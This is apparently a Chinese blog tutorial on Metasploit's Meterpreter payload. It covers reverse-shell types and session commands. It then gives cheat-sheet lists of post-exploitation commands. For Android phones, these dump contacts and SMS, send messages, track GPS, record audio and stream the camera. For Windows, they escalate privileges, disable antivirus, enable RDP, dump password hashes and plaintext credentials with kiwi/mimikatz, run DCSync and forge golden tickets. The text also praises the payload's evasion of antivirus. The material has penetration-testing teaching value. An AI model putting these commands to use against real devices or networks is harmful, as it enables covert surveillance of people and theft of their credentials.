一. Meterpreter是什么

当我们利用MSF生成了一个木马,并且在靶机上运行后,我们的MSF会进入如下的一个界面

我们进入一个meterpreter的命令行。

我们建立了一个木马链接,这在MSF中叫做一个session,第一个建立的连接就是 session 1;如果你又建立了一个连接或者漏洞利用进程,它就是session 2.

Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用。

攻击荷在触发漏洞后会返回-个由我们控制的通道,可用于远程执行命令!

Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。

Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。

除上述外,Meterpreter还支持Ruby脚本形式的扩展。所以Ruby语言还很有必要了解下。

二. Meterpreter中常用的反弹类型

  1. reverse tcp

这是一个基于TCP的反向接反shell,使用起来很稳定

  1. web_delivery

web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell。

还有其他的,但是我没用过……

三. Meterpreter常用命令

1. 常用参数

我们可以通过help来查看常用命令

2. 常用参数演示

这里就演示几个,其他的自己手动研究研究

1. backgroud

我们输入backgroud可以将当前session切到后台

这样当前的 session 1 就切到后台了

  1. sessions

我们如果在模块命令中,我们可以输入sessions可以查看当前session

我们可以通过sessions -i id来选择一个session来进入

这样就进到了session 1

  1. bglist

bglist可以查看当前运行的session

当前没有运行的session

  1. bgkill

我们先看sessions有几个任务

有这几个任务

我们现在想要杀死ID为2的session

我们进入sessions 2,然后输入 bgkill 2

啊,这两个session没运行……

3. 针对性常用命令

(1) 针对安卓的一些命令

当我们能够进入安卓手机的meterpreter后,我们可以输入一些命令来获取手机的一些信息

  • 获取手机通讯录: dump_contacts
  • 获取手机短信记录: dump_sms
  • 控制手机发短信: send_sms -d 15330252525 -t “hello” //控制手机向15330252525发出hello
  • 获取手机GPS定位信息: geolocate
  • 获取手机Wi-Fi定位信息: wlan_geolocate
  • 控制手机录音: record_mic -d 5
  • 获取手机相机设备: webcam_list
  • 控制手机拍照 : webcam_snap
  • 直播手机摄像头: webcam_stream

(2) 针对Windows的一些命令

  • 查看进程:ps
  • 查看当前进程号:getpid
  • 查看系统信息:sysinfo
  • 查看目标机是否为虚拟机:run post/windows/gather/checkvm
  • 查看完整网络设置:route
  • 查看当前权限:getuid
  • 自动提权:getsystem
  • 关闭杀毒软件:run post/windows/manage/killav
  • 启动远程桌面协议:run post/windows/manage/enable_rdp
  • 列举当前登录的用户:run post/windows/gather/enum_logged_on_users
  • 查看当前应用程序:run post/windows/gather/enum_applications
  • 抓取目标机的屏幕截图:load espia;screengrab
  • 获取相机设备:webcam_list
  • 控制拍照 :webcam_snap
  • 直播摄像头:webcam_stream
  • 控制录音:record_mic
  • 查看当前处于目标机的那个目录:pwd
  • 查看当前目录:getlwd
  • 导出当前用户密码哈希:run hashdump
    用户名:SID:LM哈希:NTLM哈希:::
    也可以使用下面这个命令导出,权限更高:run windows/gather/smart_hashdump
  • 抓取自动登录的用户名和密码:run windows/gather/credentials/windows_autologin
  • 直接获取明文密码(注意这个功能需要获取系统权限 获取系统权限需要输入getsystem)
  • 首选终端输入 load kiwi 加载kiwi
  • creds_all:列举所有凭据
  • creds_kerberos:列举所有kerberos凭据
  • creds_msv:列举所有msv凭据
  • creds_ssp:列举所有ssp凭据
  • creds_tspkg:列举所有tspkg凭据
  • creds_wdigest:列举所有wdigest凭据
  • dcsync:通过DCSync检索用户帐户信息
  • dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
  • golden_ticket_create:创建黄金票据
  • kerberos_ticket_list:列举kerberos票据
  • kerberos_ticket_purge:清除kerberos票据
  • kerberos_ticket_use:使用kerberos票据
  • kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
  • lsa_dump_sam:dump出lsa的SAM
  • lsa_dump_secrets:dump出lsa的密文
  • password_change:修改密码
  • wifi_list:列出当前用户的wifi配置文件
  • wifi_list_shared:列出共享wifi配置文件/编码